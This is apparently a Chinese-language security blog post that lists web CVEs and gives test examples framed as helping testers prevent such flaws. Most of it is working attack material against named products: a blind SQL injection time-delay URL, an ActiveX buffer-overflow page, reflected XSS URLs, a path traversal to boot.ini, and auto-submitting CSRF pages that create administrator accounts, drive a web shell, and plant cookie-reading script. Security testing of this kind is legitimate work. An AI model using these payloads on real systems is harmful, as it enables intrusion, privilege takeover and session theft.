• 實務常見網站弱點CVE與測試攻擊範例

    這篇文章主要介紹幾個實際網站弱點的個案與範例程式。

    這些範例測試程式都是實際產品所發生的弱點。

    筆者用這些例子說明在安全測試中,

    如何運用這些測試技巧加入這些測試個案,防止產品有這樣的弱點。

    常見的網站CVE

    • File path traversal CVE-2013-2678
    •  Cross-site scripting (reflected) CVE-2013-2679
    •  Cleartext submission of password CVE-2013-2680
    •  Password field with autocomplete enabled CVE-2013-2681
    •  Frameable response (Clickjacking) CVE-2013-2682
    •  Private IP addresses disclosed CVE-2013-2683
    •  HTML does not specify charset CVE-2013-2684

    Blind SQL injection 測試範例

    /iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=

    ActiveX control Buffer overflow 測試範例

    ProductName: PlayerPT ActiveX Control Module
    File version: 1.0.0.15
    Binary path: C:\WINDOWS\system32\PlayerPT.ocx
    CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
    <!-- saved from url=(0014)about:internet --> 
    <HTML>
    <object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
    </object>
    <script>
    var x="";
    for (i=0; i<13999; i++){
        x = x + "aaaa";
    }
    obj.SetSource("","","","",x);
    </script>

    Reflected XSS測試範例

    /iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
    /iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
    http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>

    Directory traversal測試範例

    http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini

    CSRF 攻擊的測試範例

    Http Post 就不會受到CSRF攻擊嗎? 這個迷思是錯的!

    看看下列這幾個”實際”的例子,CSRF甚至可以用來做 command 執行與系統管理員帳號的建立。

    CSRF 與 JavaScript 其實並列網站攻擊嚴重性之首。

    <html lang="en">
    <head>
    <title>CSRF Exploit to Create New Administrator Account</title>
    </head>
    <body>
    <form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
    id="formid" method="post">
    <input type="hidden" name="CSRFName" value="" />
    <input type="hidden" name="CSRFToken" value="" />
    <input type="hidden" name="user_id" value="" />
    <input type="hidden" name="user_login" value="" />
    <input type="hidden" name="login" value="new_admin" />
    <input type="hidden" name="firstName" value="new_administrator_fname" />
    <input type="hidden" name="lastName" value="new_administrator_lname" />
    <input type="hidden" name="password" value="new_administrator_password" />
    <input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
    <input type="hidden" name="rights_id" value="8" />
    <input type="hidden" name="locale" value="en_GB" />
    <input type="hidden" name="authentication" value="" />
    <input type="hidden" name="user_is_active" value="on" />
    <input type="hidden" name="doAction" value="doCreate" />
    <input type="hidden" name="do_update" value="Save" />
    </form>
    <script>
    document.getElementById('formid').submit();
    </script>
    </body>
    </html>
     
    <form id='ABYSMALGODS' action='
    http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'
    method='post'>
    <input id='cmd' type='text' name='terminalInput' value='calc.exe' />
    <script>document.getElementById('ABYSMALGODS').submit()</script>
    </form>
    <html>
        <body onload="javascript:document.forms[0].submit()">
        <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
        <input type="hidden" name="action" value="p_add" />
        <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>">
        <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
        <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/>
        <input type="submit" name="submit" value="Submit" class="button" />
        </form>
    </html>

     

     <html>
    This is CSRF testing sample for POST.
    The POST hidden variables listed below may change based on the target website.
    
      <body>
        <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
          <input type="hidden" name="kadi" value="knockout" />
          <input type="hidden" name="sifre" value="password" />
          <input type="hidden" name="Submit" value="Exploit!" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

    Posted by Tony @ 10:15 pm

  • Leave a Reply

    Your email address will not be published.